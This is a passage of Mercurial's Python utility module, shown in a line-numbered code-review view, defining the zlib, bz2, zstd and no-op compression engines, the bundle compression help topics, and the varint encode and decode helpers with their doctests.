3474 3503 return None
3475 3504
3476 3505 def revlogheader(self):
3477 3506 """Header added to revlog chunks that identifies this engine.
3478 3507
3479 3508 If this engine can be used to compress revlogs, this method should
3480 3509 return the bytes used to identify chunks compressed with this engine.
3481 3510 Else, the method should return ``None`` to indicate it does not
3482 3511 participate in revlog compression.
3483 3512 """
3484 3513 return None
3485 3514
3486 3515 def compressstream(self, it, opts=None):
3487 3516 """Compress an iterator of chunks.
3488 3517
3489 3518 The method receives an iterator (ideally a generator) of chunks of
3490 3519 bytes to be compressed. It returns an iterator (ideally a generator)
3491 3520 of bytes of chunks representing the compressed output.
3492 3521
3493 3522 Optionally accepts an argument defining how to perform compression.
3494 3523 Each engine treats this argument differently.
3495 3524 """
3496 3525 raise NotImplementedError()
3497 3526
3498 3527 def decompressorreader(self, fh):
3499 3528 """Perform decompression on a file object.
3500 3529
3501 3530 Argument is an object with a ``read(size)`` method that returns
3502 3531 compressed data. Return value is an object with a ``read(size)`` that
3503 3532 returns uncompressed data.
3504 3533 """
3505 3534 raise NotImplementedError()
3506 3535
3507 3536 def revlogcompressor(self, opts=None):
3508 3537 """Obtain an object that can be used to compress revlog entries.
3509 3538
3510 3539 The object has a ``compress(data)`` method that compresses binary
3511 3540 data. This method returns compressed binary data or ``None`` if
3512 3541 the data could not be compressed (too small, not compressible, etc).
3513 3542 The returned data should have a header uniquely identifying this
3514 3543 compression format so decompression can be routed to this engine.
3515 3544 This header should be identified by the ``revlogheader()`` return
3516 3545 value.
3517 3546
3518 3547 The object has a ``decompress(data)`` method that decompresses
3519 3548 data. The method will only be called if ``data`` begins with
3520 3549 ``revlogheader()``. The method should return the raw, uncompressed
3521 3550 data or raise a ``RevlogError``.
3522 3551
3523 3552 The object is reusable but is not thread safe.
3524 3553 """
3525 3554 raise NotImplementedError()
3526 3555
3527 3556 class _zlibengine(compressionengine):
3528 3557 def name(self):
3529 3558 return 'zlib'
3530 3559
3531 3560 def bundletype(self):
3532 3561 """zlib compression using the DEFLATE algorithm.
3533 3562
3534 3563 All Mercurial clients should support this format. The compression
3535 3564 algorithm strikes a reasonable balance between compression ratio
3536 3565 and size.
3537 3566 """
3538 3567 return 'gzip', 'GZ'
3539 3568
3540 3569 def wireprotosupport(self):
3541 3570 return compewireprotosupport('zlib', 20, 20)
3542 3571
3543 3572 def revlogheader(self):
3544 3573 return 'x'
3545 3574
3546 3575 def compressstream(self, it, opts=None):
3547 3576 opts = opts or {}
3548 3577
3549 3578 z = zlib.compressobj(opts.get('level', -1))
3550 3579 for chunk in it:
3551 3580 data = z.compress(chunk)
3552 3581 # Not all calls to compress emit data. It is cheaper to inspect
3553 3582 # here than to feed empty chunks through generator.
3554 3583 if data:
3555 3584 yield data
3556 3585
3557 3586 yield z.flush()
3558 3587
3559 3588 def decompressorreader(self, fh):
3560 3589 def gen():
3561 3590 d = zlib.decompressobj()
3562 3591 for chunk in filechunkiter(fh):
3563 3592 while chunk:
3564 3593 # Limit output size to limit memory.
3565 3594 yield d.decompress(chunk, 2 ** 18)
3566 3595 chunk = d.unconsumed_tail
3567 3596
3568 3597 return chunkbuffer(gen())
3569 3598
3570 3599 class zlibrevlogcompressor(object):
3571 3600 def compress(self, data):
3572 3601 insize = len(data)
3573 3602 # Caller handles empty input case.
3574 3603 assert insize > 0
3575 3604
3576 3605 if insize < 44:
3577 3606 return None
3578 3607
3579 3608 elif insize <= 1000000:
3580 3609 compressed = zlib.compress(data)
3581 3610 if len(compressed) < insize:
3582 3611 return compressed
3583 3612 return None
3584 3613
3585 3614 # zlib makes an internal copy of the input buffer, doubling
3586 3615 # memory usage for large inputs. So do streaming compression
3587 3616 # on large inputs.
3588 3617 else:
3589 3618 z = zlib.compressobj()
3590 3619 parts = []
3591 3620 pos = 0
3592 3621 while pos < insize:
3593 3622 pos2 = pos + 2**20
3594 3623 parts.append(z.compress(data[pos:pos2]))
3595 3624 pos = pos2
3596 3625 parts.append(z.flush())
3597 3626
3598 3627 if sum(map(len, parts)) < insize:
3599 3628 return ''.join(parts)
3600 3629 return None
3601 3630
3602 3631 def decompress(self, data):
3603 3632 try:
3604 3633 return zlib.decompress(data)
3605 3634 except zlib.error as e:
3606 3635 raise error.RevlogError(_('revlog decompress error: %s') %
3607 3636 str(e))
3608 3637
3609 3638 def revlogcompressor(self, opts=None):
3610 3639 return self.zlibrevlogcompressor()
3611 3640
3612 3641 compengines.register(_zlibengine())
3613 3642
3614 3643 class _bz2engine(compressionengine):
3615 3644 def name(self):
3616 3645 return 'bz2'
3617 3646
3618 3647 def bundletype(self):
3619 3648 """An algorithm that produces smaller bundles than ``gzip``.
3620 3649
3621 3650 All Mercurial clients should support this format.
3622 3651
3623 3652 This engine will likely produce smaller bundles than ``gzip`` but
3624 3653 will be significantly slower, both during compression and
3625 3654 decompression.
3626 3655
3627 3656 If available, the ``zstd`` engine can yield similar or better
3628 3657 compression at much higher speeds.
3629 3658 """
3630 3659 return 'bzip2', 'BZ'
3631 3660
3632 3661 # We declare a protocol name but don't advertise by default because
3633 3662 # it is slow.
3634 3663 def wireprotosupport(self):
3635 3664 return compewireprotosupport('bzip2', 0, 0)
3636 3665
3637 3666 def compressstream(self, it, opts=None):
3638 3667 opts = opts or {}
3639 3668 z = bz2.BZ2Compressor(opts.get('level', 9))
3640 3669 for chunk in it:
3641 3670 data = z.compress(chunk)
3642 3671 if data:
3643 3672 yield data
3644 3673
3645 3674 yield z.flush()
3646 3675
3647 3676 def decompressorreader(self, fh):
3648 3677 def gen():
3649 3678 d = bz2.BZ2Decompressor()
3650 3679 for chunk in filechunkiter(fh):
3651 3680 yield d.decompress(chunk)
3652 3681
3653 3682 return chunkbuffer(gen())
3654 3683
3655 3684 compengines.register(_bz2engine())
3656 3685
3657 3686 class _truncatedbz2engine(compressionengine):
3658 3687 def name(self):
3659 3688 return 'bz2truncated'
3660 3689
3661 3690 def bundletype(self):
3662 3691 return None, '_truncatedBZ'
3663 3692
3664 3693 # We don't implement compressstream because it is hackily handled elsewhere.
3665 3694
3666 3695 def decompressorreader(self, fh):
3667 3696 def gen():
3668 3697 # The input stream doesn't have the 'BZ' header. So add it back.
3669 3698 d = bz2.BZ2Decompressor()
3670 3699 d.decompress('BZ')
3671 3700 for chunk in filechunkiter(fh):
3672 3701 yield d.decompress(chunk)
3673 3702
3674 3703 return chunkbuffer(gen())
3675 3704
3676 3705 compengines.register(_truncatedbz2engine())
3677 3706
3678 3707 class _noopengine(compressionengine):
3679 3708 def name(self):
3680 3709 return 'none'
3681 3710
3682 3711 def bundletype(self):
3683 3712 """No compression is performed.
3684 3713
3685 3714 Use this compression engine to explicitly disable compression.
3686 3715 """
3687 3716 return 'none', 'UN'
3688 3717
3689 3718 # Clients always support uncompressed payloads. Servers don't because
3690 3719 # unless you are on a fast network, uncompressed payloads can easily
3691 3720 # saturate your network pipe.
3692 3721 def wireprotosupport(self):
3693 3722 return compewireprotosupport('none', 0, 10)
3694 3723
3695 3724 # We don't implement revlogheader because it is handled specially
3696 3725 # in the revlog class.
3697 3726
3698 3727 def compressstream(self, it, opts=None):
3699 3728 return it
3700 3729
3701 3730 def decompressorreader(self, fh):
3702 3731 return fh
3703 3732
3704 3733 class nooprevlogcompressor(object):
3705 3734 def compress(self, data):
3706 3735 return None
3707 3736
3708 3737 def revlogcompressor(self, opts=None):
3709 3738 return self.nooprevlogcompressor()
3710 3739
3711 3740 compengines.register(_noopengine())
3712 3741
3713 3742 class _zstdengine(compressionengine):
3714 3743 def name(self):
3715 3744 return 'zstd'
3716 3745
3717 3746 @propertycache
3718 3747 def _module(self):
3719 3748 # Not all installs have the zstd module available. So defer importing
3720 3749 # until first access.
3721 3750 try:
3722 3751 from . import zstd
3723 3752 # Force delayed import.
3724 3753 zstd.__version__
3725 3754 return zstd
3726 3755 except ImportError:
3727 3756 return None
3728 3757
3729 3758 def available(self):
3730 3759 return bool(self._module)
3731 3760
3732 3761 def bundletype(self):
3733 3762 """A modern compression algorithm that is fast and highly flexible.
3734 3763
3735 3764 Only supported by Mercurial 4.1 and newer clients.
3736 3765
3737 3766 With the default settings, zstd compression is both faster and yields
3738 3767 better compression than ``gzip``. It also frequently yields better
3739 3768 compression than ``bzip2`` while operating at much higher speeds.
3740 3769
3741 3770 If this engine is available and backwards compatibility is not a
3742 3771 concern, it is likely the best available engine.
3743 3772 """
3744 3773 return 'zstd', 'ZS'
3745 3774
3746 3775 def wireprotosupport(self):
3747 3776 return compewireprotosupport('zstd', 50, 50)
3748 3777
3749 3778 def revlogheader(self):
3750 3779 return '\x28'
3751 3780
3752 3781 def compressstream(self, it, opts=None):
3753 3782 opts = opts or {}
3754 3783 # zstd level 3 is almost always significantly faster than zlib
3755 3784 # while providing no worse compression. It strikes a good balance
3756 3785 # between speed and compression.
3757 3786 level = opts.get('level', 3)
3758 3787
3759 3788 zstd = self._module
3760 3789 z = zstd.ZstdCompressor(level=level).compressobj()
3761 3790 for chunk in it:
3762 3791 data = z.compress(chunk)
3763 3792 if data:
3764 3793 yield data
3765 3794
3766 3795 yield z.flush()
3767 3796
3768 3797 def decompressorreader(self, fh):
3769 3798 zstd = self._module
3770 3799 dctx = zstd.ZstdDecompressor()
3771 3800 return chunkbuffer(dctx.read_from(fh))
3772 3801
3773 3802 class zstdrevlogcompressor(object):
3774 3803 def __init__(self, zstd, level=3):
3775 3804 # Writing the content size adds a few bytes to the output. However,
3776 3805 # it allows decompression to be more optimal since we can
3777 3806 # pre-allocate a buffer to hold the result.
3778 3807 self._cctx = zstd.ZstdCompressor(level=level,
3779 3808 write_content_size=True)
3780 3809 self._dctx = zstd.ZstdDecompressor()
3781 3810 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3782 3811 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3783 3812
3784 3813 def compress(self, data):
3785 3814 insize = len(data)
3786 3815 # Caller handles empty input case.
3787 3816 assert insize > 0
3788 3817
3789 3818 if insize < 50:
3790 3819 return None
3791 3820
3792 3821 elif insize <= 1000000:
3793 3822 compressed = self._cctx.compress(data)
3794 3823 if len(compressed) < insize:
3795 3824 return compressed
3796 3825 return None
3797 3826 else:
3798 3827 z = self._cctx.compressobj()
3799 3828 chunks = []
3800 3829 pos = 0
3801 3830 while pos < insize:
3802 3831 pos2 = pos + self._compinsize
3803 3832 chunk = z.compress(data[pos:pos2])
3804 3833 if chunk:
3805 3834 chunks.append(chunk)
3806 3835 pos = pos2
3807 3836 chunks.append(z.flush())
3808 3837
3809 3838 if sum(map(len, chunks)) < insize:
3810 3839 return ''.join(chunks)
3811 3840 return None
3812 3841
3813 3842 def decompress(self, data):
3814 3843 insize = len(data)
3815 3844
3816 3845 try:
3817 3846 # This was measured to be faster than other streaming
3818 3847 # decompressors.
3819 3848 dobj = self._dctx.decompressobj()
3820 3849 chunks = []
3821 3850 pos = 0
3822 3851 while pos < insize:
3823 3852 pos2 = pos + self._decompinsize
3824 3853 chunk = dobj.decompress(data[pos:pos2])
3825 3854 if chunk:
3826 3855 chunks.append(chunk)
3827 3856 pos = pos2
3828 3857 # Frame should be exhausted, so no finish() API.
3829 3858
3830 3859 return ''.join(chunks)
3831 3860 except Exception as e:
3832 3861 raise error.RevlogError(_('revlog decompress error: %s') %
3833 3862 str(e))
3834 3863
3835 3864 def revlogcompressor(self, opts=None):
3836 3865 opts = opts or {}
3837 3866 return self.zstdrevlogcompressor(self._module,
3838 3867 level=opts.get('level', 3))
3839 3868
3840 3869 compengines.register(_zstdengine())
3841 3870
3842 3871 def bundlecompressiontopics():
3843 3872 """Obtains a list of available bundle compressions for use in help."""
3844 3873 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3845 3874 items = {}
3846 3875
3847 3876 # We need to format the docstring. So use a dummy object/type to hold it
3848 3877 # rather than mutating the original.
3849 3878 class docobject(object):
3850 3879 pass
3851 3880
3852 3881 for name in compengines:
3853 3882 engine = compengines[name]
3854 3883
3855 3884 if not engine.available():
3856 3885 continue
3857 3886
3858 3887 bt = engine.bundletype()
3859 3888 if not bt or not bt[0]:
3860 3889 continue
3861 3890
3862 3891 doc = pycompat.sysstr('``%s``\n %s') % (
3863 3892 bt[0], engine.bundletype.__doc__)
3864 3893
3865 3894 value = docobject()
3866 3895 value.__doc__ = doc
3867 3896 value._origdoc = engine.bundletype.__doc__
3868 3897 value._origfunc = engine.bundletype
3869 3898
3870 3899 items[bt[0]] = value
3871 3900
3872 3901 return items
3873 3902
3874 3903 i18nfunctions = bundlecompressiontopics().values()
3875 3904
3876 3905 # convenient shortcut
3877 3906 dst = debugstacktrace
3878 3907
3879 3908 def safename(f, tag, ctx, others=None):
3880 3909 """
3881 3910 Generate a name that it is safe to rename f to in the given context.
3882 3911
3883 3912 f: filename to rename
3884 3913 tag: a string tag that will be included in the new name
3885 3914 ctx: a context, in which the new name must not exist
3886 3915 others: a set of other filenames that the new name must not be in
3887 3916
3888 3917 Returns a file name of the form oldname~tag[~number] which does not exist
3889 3918 in the provided context and is not in the set of other names.
3890 3919 """
3891 3920 if others is None:
3892 3921 others = set()
3893 3922
3894 3923 fn = '%s~%s' % (f, tag)
3895 3924 if fn not in ctx and fn not in others:
3896 3925 return fn
3897 3926 for n in itertools.count(1):
3898 3927 fn = '%s~%s~%s' % (f, tag, n)
3899 3928 if fn not in ctx and fn not in others:
3900 3929 return fn
3901 3930
3902 3931 def readexactly(stream, n):
3903 3932 '''read n bytes from stream.read and abort if less was available'''
3904 3933 s = stream.read(n)
3905 3934 if len(s) < n:
3906 3935 raise error.Abort(_("stream ended unexpectedly"
3907 3936 " (got %d bytes, expected %d)")
3908 3937 % (len(s), n))
3909 3938 return s
3910 3939
3911 3940 def uvarintencode(value):
3912 3941 """Encode an unsigned integer value to a varint.
3913 3942
3914 3943 A varint is a variable length integer of 1 or more bytes. Each byte
3915 3944 except the last has the most significant bit set. The lower 7 bits of
3916 3945 each byte store the 2's complement representation, least significant group
3917 3946 first.
3918 3947
3919 3948 >>> uvarintencode(0)
3920 3949 '\\x00'
3921 3950 >>> uvarintencode(1)
3922 3951 '\\x01'
3923 3952 >>> uvarintencode(127)
3924 3953 '\\x7f'
3925 3954 >>> uvarintencode(1337)
3926 3955 '\\xb9\\n'
3927 3956 >>> uvarintencode(65536)
3928 3957 '\\x80\\x80\\x04'
3929 3958 >>> uvarintencode(-1)
3930 3959 Traceback (most recent call last):
3931 3960 ...
3932 3961 ProgrammingError: negative value for uvarint: -1
3933 3962 """
3934 3963 if value < 0:
3935 3964 raise error.ProgrammingError('negative value for uvarint: %d'
3936 3965 % value)
3937 3966 bits = value & 0x7f
3938 3967 value >>= 7
3939 3968 bytes = []
3940 3969 while value:
3941 3970 bytes.append(pycompat.bytechr(0x80 | bits))
3942 3971 bits = value & 0x7f
3943 3972 value >>= 7
3944 3973 bytes.append(pycompat.bytechr(bits))
3945 3974
3946 3975 return ''.join(bytes)
3947 3976
3948 3977 def uvarintdecodestream(fh):
3949 3978 """Decode an unsigned variable length integer from a stream.
3950 3979
3951 3980 The passed argument is anything that has a ``.read(N)`` method.
3952 3981
3953 3982 >>> try:
3954 3983 ... from StringIO import StringIO as BytesIO
3955 3984 ... except ImportError:
3956 3985 ... from io import BytesIO
3957 3986 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3958 3987 0
3959 3988 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3960 3989 1
3961 3990 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3962 3991 127
3963 3992 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3964 3993 1337
3965 3994 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3966 3995 65536
3967 3996 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3968 3997 Traceback (most recent call last):
3969 3998 ...
3970 3999 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3971 4000 """
3972 4001 result = 0
3973 4002 shift = 0
3974 4003 while True:
3975 4004 byte = ord(readexactly(fh, 1))
3976 4005 result |= ((byte & 0x7f) << shift)
3977 4006 if not (byte & 0x80):
3978 4007 return result
3979 4008 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now